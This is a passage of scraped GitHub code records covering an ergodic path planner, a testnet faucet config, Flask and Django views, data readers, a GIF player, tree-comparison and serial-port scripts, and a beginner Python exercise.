jnp.meshgrid(jnp.linspace(0,1,num=self.nPix[0]),jnp.linspace(0,1,num=self.nPix[1]))\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\t# print(\"nPix: \", self.nPix)\n\t\t# print(\"Shape of vmap: \",vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k).shape)\n\t\t# print(\"Shape of pdf: \", pdf.shape)\n\t\t\n\t\tphik = jnp.dot(vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k), pdf) #vmap(p)(_s)\n\t\tphik = phik/phik[0]\n\t\tself.phik = phik/self.hk\t\t \n\n\t\t# for reconstruction\n\t\tself.phik_recon = jnp.dot(self.phik, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\t\t\n\t\t# to compute gradient func\n\t\tself.gradient = jit(grad(self.fourier_ergodic_loss))\n\t\tself.temptraj=[]\n\t\tself.fulltraj=[]\n\t\tself.step=0\n\t\tself.step_size=50\n\t\tself.precau=[]\n\n\t\treturn\n\t\n\tdef get_recon(self, FC):\n\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\treturn jnp.dot(FC, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\n\tdef get_ck(self, tr):\n\t\t\"\"\"\n\t\tgiven a trajectory tr, compute fourier coeffient of its spatial statistics.\n\t\tk is the number of fourier coeffs.\n\t\t\"\"\"\n\t\tck = jnp.mean(vmap(partial(self.fk_vmap, tr))(self.k), axis=1)\n\t\tck = ck / self.hk\n\t\treturn ck\n\n\tdef fourier_ergodic_loss(self, u): \n\t\tck = 0\n\t\ttrajectories=copy.copy(self.fulltraj)\n\t\tx0_i=self.x0\n\t\txf, tr,thet = GetTrajXY(u, x0_i)\n\t\tself.temptehta=thet\n\t\tfor k in range(len(tr)):\n\t\t\ttrajectories.append(tr[k])\n\t\tck = self.get_ck(jnp.array(trajectories))\n\t\tself.temptraj=trajectories\n\n\t\t\n\t\ttraj_cost = 0 \n\t\t# lambda, the weights of different bands.\n\t\ttraj_cost += jnp.mean((jnp.array(trajectories) - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) + 3e-2 * 
jnp.mean(u**2) + traj_cost\n\t\tprint(\"Ergodicity: \", ergodicity)\n\t\tprint(\"len of traj: \", len(self.temptraj))\n\t\t# print(self.temptraj[-1])\n\t\treturn ergodicity\n\n\tdef fourier_ergodic_lossbb(self, u, flag=False): \n\t\tck = 0\n\n\t\ttrajectories=copy.copy(self.fulltraj)\n\t\tx0_i=[0,0,0]\n\t\t# GetTrajXY takes (u, x0) and returns (xf, tr, theta); the extra argument\n\t\t# and fourth return value previously used here did not match its signature\n\t\txf, tr, thet = GetTrajXY(u, x0_i)\n\t\tself.temptehta=thet\n\t\tfor k in range(len(tr)):\n\t\t\ttrajectories.append(tr[k])\n\t\tck = self.get_ck(jnp.array(trajectories))\n\n\t\tck = ck / (self.n_agents)\n\t\tself.temptraj=trajectories\n\n\t\t\n\t\ttraj_cost = 0 \n\t\ttraj_cost += jnp.mean((jnp.array(trajectories) - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) # + 3e-2 * jnp.mean(u**2) + traj_cost\n\t\tprint(\"Ergodicity: \", ergodicity)\n\t\tprint(\"len of traj: \", len(self.temptraj))\n\t\treturn ergodicity\n\n\n\n\tdef trajstep(self,flag):\n\t\tself.step+=1\n\t\t# tempvar=tempvar+1\n\n\t\t# for i in range(len(self.temptraj)):\n\t\tself.fulltraj=[]\n\t\tprint(len(self.temptraj),\" fcc\")\n\t\tif (flag):\n\t\t\tfor i in range(len(self.temptraj)):\n\t\t\t\tself.fulltraj.append(self.temptraj[i])\n\t\t\treturn\n\t\t\n\t\tfor i in range(self.step_size*self.step):\n\t\t\t# clamp each coordinate into the unit square [0, 1] x [0, 1]\n\t\t\ta = min(max(self.temptraj[i][0], 0), 1)\n\t\t\tb = min(max(self.temptraj[i][1], 0), 1)\n\n\t\t\tself.fulltraj.append([a,b])\n\t\t\t# print(a,b)\n\t\tself.theta=wrapToPi(self.temptehta)\n\t\t# print(self.precau[self.step_size-1], \" theta\")\n\t\t# self.theta=self.precau[self.step_size-1][2]\n\t\treturn\n\n\n\n\n\n\tdef fourier_ergodic_loss_traj(self,traj):\n\t\tck = self.get_ck(traj)\n\t\ttraj_cost = jnp.mean((traj - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) + traj_cost\n\t\treturn ergodicity\n\n\tdef traj_stat(self, u, x0):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\txf, tr, _ = GetTrajXY(u, x0)  # third return value (theta) is unused here\n\t\tck = self.get_ck(tr)\n\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\tpdf = jnp.dot(ck, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\t\treturn pdf\n","repo_name":"bshirose/ergodic_planner","sub_path":"ergodic_metric.py","file_name":"ergodic_metric.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33723288603","text":"from time import sleep\n\nimport requests\n\nfrom cosmpy.aerial.config import NetworkConfig\n\nNET_CONFIG = NetworkConfig(\n chain_id=\"osmo-test-4\",\n url=\"rest+https://lcd-test.osmosis.zone/\",\n fee_minimum_gas_price=1,\n fee_denomination=\"uosmo\",\n staking_denomination=\"uosmo\",\n)\n\n\nclass FaucetMixIn:\n \"\"\"Osmosis faucet config\"\"\"\n\n def ask_funds(self, wallet):\n \"\"\"Request funds from the faucet.\n\n :param wallet: Wallet Address\n :raises Exception: fail to topup\n \"\"\"\n resp = requests.post(\n \"https://testnet-faucet.dev-osmosis.zone/request\",\n json={\"address\": str(wallet.address())},\n )\n assert resp.status_code == 200\n ledger = self.get_ledger()\n for i in range(10):\n if ledger.query_bank_balance(wallet.address()) > 0:\n break\n sleep(i * 2)\n else:\n raise Exception(\"fail to 
topup\")\n","repo_name":"SantaHub/cosmpy","sub_path":"tests/integration/osmosis_testnet/net_config.py","file_name":"net_config.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"34996898627","text":"from flask import Blueprint\nfrom flask_api import status\nimport json\nimport mysql.connector\nimport conf\n\nrandom = Blueprint('random', __name__)\n\n@random.route('/random/')\ndef handle(amount):\n # amount should be > 1\n if (amount < 1):\n return '', status.HTTP_400_BAD_REQUEST\n\n connector = mysql.connector.connect(\n user=conf.user,\n database=conf.database,\n passwd=conf.passwd,\n host=conf.host,\n port=conf.port)\n\n answer = []\n\n cursor = connector.cursor()\n\n cursor.callproc('get_random_items', args=[amount])\n\n result = next(cursor.stored_results())\n\n for line in result:\n answer.append(line[0])\n\n cursor.close()\n return json.dumps(answer), status.HTTP_200_OK","repo_name":"qwertxzy/nozama-api","sub_path":"endpoints/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509894738","text":"\"\"\"\nAuthor : Byunghyun Ban\nDate : 2020.07.17.\n\"\"\"\nimport random\n\nimport time\ntry:\n from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n import pip\n pip.main(['install', 'matplotlib'])\n try:\n from matplotlib import pyplot as plt\n except ModuleNotFoundError:\n time.sleep(2)\n from matplotlib import pyplot as plt\n\ntry:\n import numpy as np\nexcept ModuleNotFoundError:\n import pip\n pip.main(['install', 'numpy'])\n try:\n import numpy as np\n except ModuleNotFoundError:\n time.sleep(2)\n import numpy as np\n\n\n# 데이터를 떠먹여 줄 클래스를 제작합니다.\nclass DataReader():\n def __init__(self):\n self.label = [\"Iris-setosa\", \"Iris-versicolor\", \"Iris-virginica\"]\n\n self.train_X, self.train_Y, self.test_X, self.test_Y = self.read_data()\n\n # 데이터 읽기가 완료되었습니다.\n # 읽어온 데이터의 정보를 출력합니다.\n print(\"\\n\\nData Read Done!\")\n print(\"Training X Size : \" + str(self.train_X.shape))\n print(\"Training Y Size : \" + str(self.train_Y.shape))\n print(\"Test X Size : \" + str(self.test_X.shape))\n print(\"Test Y Size : \" + str(self.test_Y.shape) + '\\n\\n')\n\n def read_data(self):\n print(\"Reading Data...\")\n file = open(\"data/iris.csv\")\n data = []\n for line in file:\n splt = line.split(\",\")\n if len(splt) != 5:\n break\n feature_1 = float(splt[0].strip())\n feature_2 = float(splt[1].strip())\n feature_3 = float(splt[2].strip())\n feature_4 = float(splt[3].strip())\n label = self.label.index(splt[4].strip())\n data.append(((feature_1, feature_2, feature_3, feature_4), label))\n\n random.shuffle(data)\n\n X = []\n Y = []\n\n for el in data:\n X.append(el[0])\n Y.append(el[1])\n\n X = np.asarray(X)\n Y = np.asarray(Y)\n\n X = X / np.max(X, axis=0)\n\n train_X = X[:int(len(X)*0.8)]\n train_Y = Y[:int(len(Y)*0.8)]\n test_X = X[int(len(X)*0.8):]\n test_Y = Y[int(len(Y)*0.8):]\n\n return train_X, train_Y, test_X, test_Y\n\n\ndef draw_graph(history):\n train_history = history.history[\"loss\"]\n validation_history = history.history[\"val_loss\"]\n fig = plt.figure(figsize=(8, 8))\n plt.title(\"Loss History\")\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"LOSS Function\")\n plt.plot(train_history, \"red\")\n plt.plot(validation_history, 'blue')\n fig.savefig(\"train_history.png\")\n\n train_history = history.history[\"accuracy\"]\n validation_history = 
history.history[\"val_accuracy\"]\n fig = plt.figure(figsize=(8, 8))\n plt.title(\"Accuracy History\")\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"Accuracy\")\n plt.plot(train_history, \"red\")\n plt.plot(validation_history, 'blue')\n fig.savefig(\"accuracy_history.png\")\n","repo_name":"needleworm/bhban_ai","sub_path":"[2편] 인간의 뇌세포를 흉내 낸 인공지능 - FNN/[5장] 분류(Classification) 기법 활용하기/2_5_2_AI는 꽃을 구분할 수 있을까/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"74199476967","text":"#!/usr/bin/env python3\n\"\"\"Shebang\"\"\"\n\n\npi = 3.1415926536\ne = 2.7182818285\n\n\nclass Poisson:\n \"\"\"Define a Poisson Class\"\"\"\n def __init__(self, data=None, lambtha=1.):\n if data is None:\n if lambtha <= 0:\n raise ValueError(\"lambtha must be a positive value\")\n self.lambtha = float(lambtha)\n else:\n if not isinstance(data, list):\n raise TypeError(\"data must be a list\")\n if len(data) < 2:\n raise ValueError(\"data must contain multiple values\")\n self.lambtha = sum(data) / len(data)\n\n def pmf(self, k):\n \"\"\"Returns the pmf probability\"\"\"\n k = k if type(k) == int else int(k)\n if k < 0:\n return 0\n k_fact = 1\n for i in range(k):\n k_fact += k_fact * i\n return ((e ** -self.lambtha * self.lambtha ** k) / (k_fact))\n\n def cdf(self, k):\n \"\"\"Returns the cdf\"\"\"\n sum = 0\n k = k if type(k) == int else int(k)\n if k < 0:\n return 0\n for i in range(k + 1):\n sum += self.pmf(i)\n return sum\n","repo_name":"NMenendez24/holbertonschool-machine_learning","sub_path":"math/probability/poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21015212062","text":"import PIL.Image as Image\n\n\nclass Gif_Player(object):\n \"\"\" Draw a single gif image \"\"\"\n\n def __init__(self, filename):\n \"\"\" Open filename as the GIF \"\"\"\n\n self.filename = filename\n self.image = None\n self.time_played_ms = 0\n self.timeout_ms = None\n self.eof = True\n self.current_frame = 0\n\n @property\n def is_finished(self):\n \"\"\" We're finished if we're at the eof and we've passed the timeout \"\"\"\n\n if self.timeout_ms is None:\n is_finished = self.eof\n elif self.eof and self.time_played_ms >= self.timeout_ms:\n is_finished = True\n else:\n is_finished = False\n\n return is_finished\n\n def start(self, timeout_ms=None):\n \"\"\" Reset to the beginning \"\"\"\n\n self.timeout_ms = timeout_ms\n self.image = Image.open(self.filename)\n self.time_played_ms = 0\n self.eof = False\n self.current_frame = 0\n\n def draw_frame(self):\n \"\"\" Draw a single frame and return the requested delay \"\"\"\n\n image_copy = self.image.copy()\n\n # Find the encoded duration in milliseconds\n try:\n frame_duration_ms = image_copy.info[\"duration\"]\n except KeyError:\n frame_duration_ms = 25\n\n self.current_frame += 1\n\n # Seek to the current frame, if it exists\n try:\n self.image.seek(self.current_frame)\n except EOFError:\n self.current_frame = 0\n self.image.seek(self.current_frame)\n self.eof = True\n\n self.time_played_ms += frame_duration_ms\n\n return image_copy, frame_duration_ms\n","repo_name":"mattgrogan/ledmatrix","sub_path":"ledmatrix/animation/gif_player.py","file_name":"gif_player.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
+{"seq_id":"36235172942","text":"'''\nCompare two trees by visualization and by \nRobinson-Foulds distance\n'''\n\nfrom Bio import Phylo\nimport matplotlib.pyplot as plt\nimport dendropy\nfrom dendropy import Tree\nfrom collections import defaultdict\nimport pandas as pd\n\nnum_seq = [10, 100, 200, 300, 400, 500, 600, 700, 900, 1000]\ntree_dir = \"../processed_data/phylogenetic/runtime_vs_num_seq/\"\ndef draw_tree(tree_fn, out_fn):\n\tplt.close()\n\ttree = Phylo.read(tree_fn, \"newick\")\n\tPhylo.draw(tree)\n\tplt.tight_layout()\n\tplt.savefig(out_fn)\n\tplt.close()\n\ndef run_draw_tree(num_seq):\n\tfor n in num_seq:\n\t\tprint(f\"Number of seq: {n}\")\n\t\tiqtree_fn = f\"{tree_dir}/{n}.np1.treefile\"\n\t\ttreebest_nj_fn = f\"{tree_dir}/{n}.np1.nj.nhx\"\n\n\t\tdraw_tree(iqtree_fn, f\"{tree_dir}/{n}.np1.png\")\n\t\tdraw_tree(treebest_nj_fn, f\"{tree_dir}/{n}.np1.nj.png\")\n\n\ndef get_robinson_foulds_distance(num_seq):\n\tcontainer = defaultdict(list)\n\tfor n in num_seq:\n\t\tiqtree_fn = f\"{tree_dir}/{n}.np1.treefile\"\n\t\ttreebest_nj_fn = f\"{tree_dir}/{n}.np1.nj.nhx\"\n\n\t\tprint(f\"Number of seq: {n}\")\n\t\tiqtree = Tree.get(path=iqtree_fn, schema=\"newick\")\n\t\ttreebest_nj = Tree.get(path=treebest_nj_fn, schema=\"newick\", taxon_namespace=iqtree.taxon_namespace)\n\t\tdist = dendropy.calculate.treecompare.symmetric_difference(iqtree, treebest_nj)\n\t\tcontainer[\"num\"].append(n)\n\t\tcontainer[\"robinson_foulds\"].append(dist)\n\n\trobinson_foulds = pd.DataFrame(container)\n\treturn robinson_foulds\n\n\ndef plot_robinson_foulds_distance(robinson_foulds):\n\tplt.close()\n\tfig, ax = plt.subplots(2,1, figsize=(4,6))\n\tax[0].plot(\"num\", \"robinson_foulds\", \"go\", data=robinson_foulds)\n\tax[0].set_xlabel(\"number of sequence\")\n\tax[0].set_ylabel(\"Robinson-Foulds distance\")\n\n\tax[1].plot(\"num\", \"robinson_foulds\", \"go\", data=robinson_foulds)\n\tax[1].set_xscale(\"log\")\n\tax[1].set_yscale(\"log\")\n\tax[1].set_xlabel(\"log(number of sequence)\")\n\tax[1].set_ylabel(\"Robinson-Foulds distance\")\n\n\tfig.tight_layout()\n\tfig.savefig(f\"{tree_dir}/robinson_foulds_dist.png\")\n\n\nrun_draw_tree(num_seq)\nrobinson_foulds = get_robinson_foulds_distance(num_seq)\nplot_robinson_foulds_distance(robinson_foulds)\n","repo_name":"boxiangliu/covseq","sub_path":"phylogenetic/compare_trees.py","file_name":"compare_trees.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"984796935","text":"import serial\nimport time as time\nfrom multiprocessing import Process\nfrom multiprocessing.sharedctypes import Value\n\n\ndef demo_UART(port_name):\n while True:\n with serial.Serial(port_name, baudrate=115200, timeout=5) as ser:\n line = ser.readline()\n content = line.decode()\n content = content.strip()\n # content = content.split('\\n')[-1:-3:-1]\n # content = [txt.strip() for txt in content]\n if content != \"[INFO: TSCH ] scanning on channel 20\":\n print(\"content = {0}\".format(content))\n # , parity=serial.PARITY_EVEN, rtscts=1\n time.sleep(5)\n\n\ndef async_func(truth):\n print(\"ASYNC function begin\")\n time.sleep(5)\n truth.value = 0\n print(\"ASYNC function done\")\n return\n\ndef demo_multi_prcessing():\n print(\"STARTING DEMO: MULTI_PROCESSING\")\n\n t = Value('i',1,lock=False)\n p = Process(target=async_func, args=(t,))\n count = 0\n p.start()\n while t.value:\n print(\"count = {0}\".format(count))\n count += 1\n time.sleep(1)\n print(\"ENDING DEMO: 
MULTI_PROCESSING\")\n\n p.join()\n\n\nif __name__ == '__main__':\n port_name = \"/dev/ttyACM0\"\n demo_UART(port_name)\n # demo_multi_prcessing()\n","repo_name":"Project-Repositories/BSC_Proj_IoRT","sub_path":"Robot Controller code/Demos/pyserial_demo.py","file_name":"pyserial_demo.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42774350327","text":"#Exercice 1 :\n\n#----1\nv1 = \"Variable\"\nprint(2, \"Salut\", v1)\n#Pour passer à la ligne, il faut faire un autre appel à la fonction print()\n\n#----2\n#Boucle while:\n#i = 0\n#while (i <= 100):\n# print(i)\n# i = i+1\n\n#Boucle for:\n#for i in range(101):\n# print(i)\n# i = i+1\n\nfrom turtle import *\n\n#Fonction pour créer une figure géométrique\n#Paramètres : figureType = Type de figure géométrique (Carré ou Triangle)\n# tailleArrete = longueur des arrêtes, couleurArrete = couleur des arrêtes,\n#creuxBool = si la figure géométrique est creuse ou non, couleurInterieur = couleur de l'intérieur si la\n#figure géométrique n'est pas creuse\n\ndef creerFigureGeometrique(figureType, tailleArrete, couleurArrete, creuxBool, couleurInterieur):\n color(couleurArrete, couleurInterieur)\n #Si la figure géométrique est non creuse\n if creuxBool == False:\n begin_fill()\n while True:\n forward(tailleArrete)\n if figureType == \"Carré\":\n left(90)\n if figureType == \"Triangle\":\n left(120)\n if abs(pos()) < 1:\n break\n end_fill()\n done()\n #Si la figure géométrique est creuse\n else:\n while True:\n forward(tailleArrete)\n if figureType == \"Carré\":\n left(90)\n if figureType == \"Triangle\":\n left(120)\n if abs(pos()) < 1:\n break\n done()\n \n#creerFigureGeometrique(\"Carré\", 200, \"red\", False, \"Yellow\")\n#creerFigureGeometrique(\"Carré\", 200, \"red\", True, \"\")\n\n#creerFigureGeometrique(\"Triangle\", 200, \"red\", False, \"Yellow\")\n#creerFigureGeometrique(\"Triangle\", 200, \"red\", True, \"\")\n\n\n#----3\nl = [5,9,7,2]\nprint(l)\n\nprint(len(l))\n\nl[2] = 10\nprint(l)\n\ndel l[2]\nprint(l)\n\nl.insert(2,10)\nprint(l)\n\nfor i in l:\n print(i)\n\ni = 0\nwhile i < len(l):\n print(l[i])\n i = i+1\n\n#----4\nimport random\n#Nombre aléatoire entre 3 et 9\nprint(random.randint(3, 9))\nprint(random.randrange(3, 9))\n#Elément aléatoire dans une liste\nl = [\"pomme\", \"banane\", \"cerise\"]\nprint(random.choice(l))\n#Réorganise aléatoirement la liste\nrandom.shuffle(l)\nprint(l)","repo_name":"MadaniBensikhaled/tp_python_1","sub_path":"Exercice1.py","file_name":"Exercice1.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25624287716","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom accounts.mixins.user_type_mixins import IsUserViewMixin\nfrom buildings.constants import LOCATION_CHOICES, CURRENT_CHOICES, FUEL_CHOICES, CONTAINER_LOCATION_CHOICES, \\\n GENERATOR_DISPENSING_CHOICES, GENERATOR_TYPE_CHOICES, SERVICE_SYSTEM_CHOICES, HAZARDOUS_AREA_CHOICES\nfrom business.models import Business\nfrom checklists.constants import REINSPECT, APPROVED, FAILED\nfrom checklists.models import Checklist as Master\nfrom inspections.constants import DONE\nfrom inspections.models 
import InspectionSchedule\nfrom inspector_dashboards.controllers.views.inspector_dashboards.checklist.forms import ChecklistForm as MasterForm\n\n\"\"\"\nURLS\n# Checklist\n\nfrom inspector_dashboards.controllers.views.inspector_dashboards.checklist import main as checklist_views\n\nurlpatterns += {\n path(\n 'checklist/list',\n checklist_views.InspectorDashboardChecklistListView.as_view(),\n name='inspector_dashboard_checklist_list'\n ),\n path(\n 'checklist/<pk>/detail',\n checklist_views.InspectorDashboardChecklistDetailView.as_view(),\n name='inspector_dashboard_checklist_detail'\n ),\n path(\n 'checklist/create',\n checklist_views.InspectorDashboardChecklistCreateView.as_view(),\n name='inspector_dashboard_checklist_create'\n ),\n path(\n 'checklist/<pk>/update',\n checklist_views.InspectorDashboardChecklistUpdateView.as_view(),\n name='inspector_dashboard_checklist_update'\n ),\n path(\n 'checklist/<pk>/delete',\n checklist_views.InspectorDashboardChecklistDeleteView.as_view(),\n name='inspector_dashboard_checklist_delete'\n )\n}\n\"\"\"\n\n\nclass InspectorDashboardChecklistListView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n List view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - Optionally used for multi-user/multi-tenant apps to separate ownership\n - ex: company=kwargs.get('company')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj_list = Master.objects.actives()\n paginator = Paginator(obj_list, 1000)\n page = request.GET.get('page')\n objs = paginator.get_page(page)\n\n context = {\n \"page_title\": f\"Checklist\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"list\",\n \"paginator\": paginator,\n \"objects\": objs\n }\n\n return render(request, \"inspector_dashboard/checklist/list.html\", context)\n\n\nclass InspectorDashboardChecklistCreateView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Create view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - Optionally used for multi-user/multi-tenant apps to separate ownership\n - ex: company=kwargs.get('company')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n form = MasterForm\n pk = kwargs.get('pk', None)\n inspection_schedule = InspectionSchedule.objects.get(pk=pk)\n business = Business.objects.get(pk=inspection_schedule.business.pk)\n\n location_choices = LOCATION_CHOICES\n current_choices = CURRENT_CHOICES\n fuel_choices = FUEL_CHOICES\n container_location_choices = CONTAINER_LOCATION_CHOICES\n generator_dispensing_choices = GENERATOR_DISPENSING_CHOICES\n generator_type_choices = GENERATOR_TYPE_CHOICES\n service_system_choices = SERVICE_SYSTEM_CHOICES\n hazardous_area_choices = HAZARDOUS_AREA_CHOICES\n\n if 'checklist_formdata' in request.session:\n checklist_formdata = request.session['checklist_formdata']\n del request.session['checklist_formdata']\n else:\n checklist_formdata = {\n 'first_name': '',\n 'middle_name': '',\n 'last_name': '',\n 'policy_no': '',\n 'building_permit': '',\n 'occupancy_permit': '',\n 'fsic_control_no': '',\n 'fsic_fee': '',\n 'fire_drill_certificate': '',\n 'violation_control_no': '',\n 'electrical_inspection_no': '',\n 'sectional_occupancy': '',\n 'exits_count': '',\n 'exits_width': '',\n 'exits_accessible': '',\n 'termination_of_exit': '',\n 'exits_enclosure_provided': '',\n 'exits_enclosure_construction': '',\n 'exits_fire_doors_provided': '',\n 
'exits_fire_door_construction': '',\n 'stairs_count': '',\n 'stairs_enclosure_provided': '',\n 'stairs_enclosure_construction': '',\n 'stairs_fire_doors_provided': '',\n 'stairs_fire_door_construction': '',\n 'other_details': '',\n 'emergency_light': '',\n 'exit_signs_illuminated': '',\n 'fire_extinguisher_count': '',\n 'fire_extinguisher_accessible': '',\n 'fire_extinguisher_conspicuous_location': '',\n 'fire_alarm': '',\n 'detectors': '',\n 'control_panel_location': '',\n 'control_panel_functional': '',\n 'hazardous_materials': '',\n 'hazardous_materials_properly_stored': '',\n 'no_smoking_sign': '',\n 'smoking_permitted': '',\n 'smoking_area_location': '',\n 'storage_location': '',\n 'safety_device_for_lpg': '',\n 'oven_used': '',\n 'kind_of_fuel': '',\n 'smoke_hood': '',\n 'spark_arrester': '',\n 'partition_construction': '',\n 'defects': '',\n 'building_permit_date_issued': '',\n 'occupancy_permit_date_issued': '',\n 'fsic_date_issued': '',\n 'fire_drill_certificate_date_issued': '',\n 'violation_control_no_date_issued': '',\n 'electrical_inspection_date_issued': '',\n 'insurance_date_issued': '',\n 'notes': '',\n 'recommendations': '',\n }\n\n context = {\n \"page_title\": \"Create new Checklist\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"create\",\n \"checklist_formdata\": checklist_formdata,\n \"form\": form,\n \"location_choices\": location_choices,\n \"current_choices\": current_choices,\n \"fuel_choices\": fuel_choices,\n \"container_location_choices\": container_location_choices,\n \"generator_dispensing_choices\": generator_dispensing_choices,\n \"generator_type_choices\": generator_type_choices,\n \"service_system_choices\": service_system_choices,\n \"hazardous_area_choices\": hazardous_area_choices,\n \"business\": business,\n \"inspection_schedule\": inspection_schedule,\n }\n\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n def post(self, request, *args, **kwargs):\n form = MasterForm(request.POST, request.FILES)\n pk = kwargs.get('pk', None)\n\n inspection_schedule = InspectionSchedule.objects.get(pk=pk)\n\n checklist_formdata = {\n 'first_name': request.POST.get('first_name', ''),\n 'middle_name': request.POST.get('middle_name', ''),\n 'last_name': request.POST.get('last_name', ''),\n 'policy_no': request.POST.get('policy_no', ''),\n 'building_permit': request.POST.get('building_permit', ''),\n 'occupancy_permit': request.POST.get('occupancy_permit', ''),\n 'fsic_control_no': request.POST.get('fsic_control_no', ''),\n 'fsic_fee': request.POST.get('fsic_fee', ''),\n 'fire_drill_certificate': request.POST.get('fire_drill_certificate', ''),\n 'violation_control_no': request.POST.get('violation_control_no', ''),\n 'electrical_inspection_no': request.POST.get('electrical_inspection_no', ''),\n 'sectional_occupancy': request.POST.get('sectional_occupancy', ''),\n 'exits_count': request.POST.get('exits_count', ''),\n 'exits_width': request.POST.get('exits_width', ''),\n 'exits_accessible': request.POST.get('exits_accessible', ''),\n 'termination_of_exit': request.POST.get('termination_of_exit', ''),\n 'exits_enclosure_provided': request.POST.get('exits_enclosure_provided', ''),\n 'exits_enclosure_construction': request.POST.get('exits_enclosure_construction', ''),\n 'exits_fire_doors_provided': request.POST.get('exits_fire_doors_provided', ''),\n 'exits_fire_door_construction': request.POST.get('exits_fire_door_construction', ''),\n 'stairs_count': 
request.POST.get('stairs_count', ''),\n 'stairs_enclosure_provided': request.POST.get('stairs_enclosure_provided', ''),\n 'stairs_enclosure_construction': request.POST.get('stairs_enclosure_construction', ''),\n 'stairs_fire_doors_provided': request.POST.get('stairs_fire_doors_provided', ''),\n 'stairs_fire_door_construction': request.POST.get('stairs_fire_door_construction', ''),\n 'other_details': request.POST.get('other_details', ''),\n 'emergency_light': request.POST.get('emergency_light', ''),\n 'exit_signs_illuminated': request.POST.get('exit_signs_illuminated', ''),\n 'fire_extinguisher_count': request.POST.get('fire_extinguisher_count', ''),\n 'fire_extinguisher_accessible': request.POST.get('fire_extinguisher_accessible', ''),\n 'fire_extinguisher_conspicuous_location': request.POST.get('fire_extinguisher_conspicuous_location', ''),\n 'fire_alarm': request.POST.get('fire_alarm', ''),\n 'detectors': request.POST.get('detectors', ''),\n 'control_panel_location': request.POST.get('control_panel_location', ''),\n 'control_panel_functional': request.POST.get('control_panel_functional', ''),\n 'hazardous_materials': request.POST.get('hazardous_materials', ''),\n 'hazardous_materials_properly_stored': request.POST.get('hazardous_materials_properly_stored', ''),\n 'no_smoking_sign': request.POST.get('no_smoking_sign', ''),\n 'smoking_permitted': request.POST.get('smoking_permitted', ''),\n 'smoking_area_location': request.POST.get('smoking_area_location', ''),\n 'storage_location': request.POST.get('storage_location', ''),\n 'safety_device_for_lpg': request.POST.get('safety_device_for_lpg', ''),\n 'oven_used': request.POST.get('oven_used', ''),\n 'kind_of_fuel': request.POST.get('kind_of_fuel', ''),\n 'smoke_hood': request.POST.get('smoke_hood', ''),\n 'spark_arrester': request.POST.get('spark_arrester', ''),\n 'partition_construction': request.POST.get('partition_construction', ''),\n 'defects': request.POST.get('defects', ''),\n 'building_permit_date_issued': request.POST.get('building_permit_date_issued', ''),\n 'occupancy_permit_date_issued': request.POST.get('occupancy_permit_date_issued', ''),\n 'fsic_date_issued': request.POST.get('fsic_date_issued', ''),\n 'fire_drill_certificate_date_issued': request.POST.get('fire_drill_certificate_date_issued', ''),\n 'violation_control_no_date_issued': request.POST.get('violation_control_no_date_issued', ''),\n 'electrical_inspection_date_issued': request.POST.get('electrical_inspection_date_issued', ''),\n 'insurance_date_issued': request.POST.get('insurance_date_issued', ''),\n 'date_checked': request.POST.get('date_checked', 